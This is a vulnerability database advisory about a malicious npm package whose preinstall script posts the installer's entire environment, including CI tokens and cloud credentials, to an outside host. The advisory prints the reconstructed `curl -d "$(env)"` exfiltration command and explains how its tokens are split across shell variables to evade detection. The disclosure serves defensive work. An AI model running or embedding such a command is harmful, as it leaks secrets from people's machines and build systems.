VDB
GCVE-110-OSM-2026-13418
GCVE-110-OSM-2026-13418
Advisory PublishedCVSS 8.8/10
package.json declares a preinstall lifecycle script `sh./test.sh`. test.sh assembles a `curl -d "$(env)" https://abbishal.com/sh/installation-success` command by splitting the tokens `curl`, `env`, and `-d` across single-character shell variables (`i=c`, `s=u`, `a=rl`, `t=en`) and reconstructing them via variable concatenation and command substitution. On `npm install` this POSTs the entire output of `env` — the installer shell/CI's full process environment, including any exported secrets such as CI tokens, cloud credentials (AWS_*, GCP, Azure), and npm publish tokens — to a hardcoded third-party host. The README asserts that the package performs no network requests, no filesystem access, no data collection, and has no preinstall/postinstall lifecycle scripts, directly contradicting the shipped manifest and script. The variable-fragment obfuscation and the cover-story README indicate deliberate evasion rather than a legitimate placeholder or canary.
ENTRY
colours.scss (main: colours.scss)
- Preinstall Script in package.json: ""preinstall": "sh ./test.sh""
ADDITIONAL FINDINGS
- Brand New Package
- Very New NPM Publisher Account
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
8.8/10
High · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | abbishal-poc-as-dependency | all (affected) | — |
Aliases
Browse GCVE Records
3,328 records in the GCVE database · Updated October 10, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.